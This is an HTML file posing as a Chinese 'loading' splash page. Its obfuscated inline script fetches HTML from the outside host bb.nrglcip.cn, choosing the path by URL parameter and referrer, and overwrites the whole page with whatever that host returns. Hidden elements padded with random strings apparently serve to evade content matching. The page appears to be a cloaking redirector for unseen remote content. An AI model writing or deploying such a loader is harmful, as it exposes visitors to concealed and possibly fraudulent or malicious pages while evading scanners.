<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sa0s92nkv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sa0s92nkv .V89gIP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sa0s92nkv .content {
            line-height: 50px;
            text-align: center
        }

        .sa0s92nkv .img {
            width: 100%
        }

        .sa0s92nkv .VETDZ5r7hx {
            text-align: center
        }

        .sa0s92nkv .VETDZ5r7hx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sa0s92nkv .VETDZ5r7hx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sa0s92nkv .VETDZ5r7hx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sa0s92nkv .VETDZ5r7hx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sa0s92nkv .VETDZ5r7hx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sa0s92nkv .VETDZ5r7hx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sa0s92nkv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ghiGEYbYiY2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var UiYu9lN = ghiGEYbYiY2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ UiYu9lN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ UiYu9lN +".html?a=share";
		}
		
        Ug48z4c37G=url+"#"+new Date().getTime();
        Ug48z4c37G && function() {
            $.get(Ug48z4c37G, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>tHVjwLPPkjDsKI9QBgj3CCWQoJHnH6MhDNDRb9M4vYjSASY70cRrGJcnnr0VCdh9tob0ut6ycUpyXjdZPiu</a>
<li style='display:none' >xZwLsg58SbKHtVKMXOUPgFf9KdHF4ZTM54DThc03pvh7yDbKOd86HQf1UEW24T5fr48gBgqCYFWJOBgTSHYXO</li>
<img  src='' style='display:none'>
<b style='display:none' >mB9Ty5NS0pM1eS</b><div class="sa0s92nkv">
    <div class="V89gIP">
        <div class="VETDZ5r7hx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>XqSNAOEUU476DMpPxXgaGKUXmy9CN2LLD2eFd69wJG1VWTBVLQECzekFv9pTvaTNcHaX</a>
<p  style='display:none'>SLIGvcVNvKY638fyIYTbGq6OZTL0fQcHEKYvA3hzNzWrYeTJvScztatdntKD62jJbhjucy5RVdBdR8o</p>
<b style='display:none' >RZQoqbU1s3kiQ59tcxlIdXJTeVjUa4hpDQjHg</b>
<ul style='display:none' >ufQfgBmfmuDTiGE0IUXhdZLhcePg1LTV3el730E1MSmSilWNK0W8</ul>
<span style='display:none'>fBg1oCl9xKRyk3uFM7XLsZ0B7uBx8RoIGeqbEXeF6up5eHLbWow9nlXuMpHw</span></body>
</html>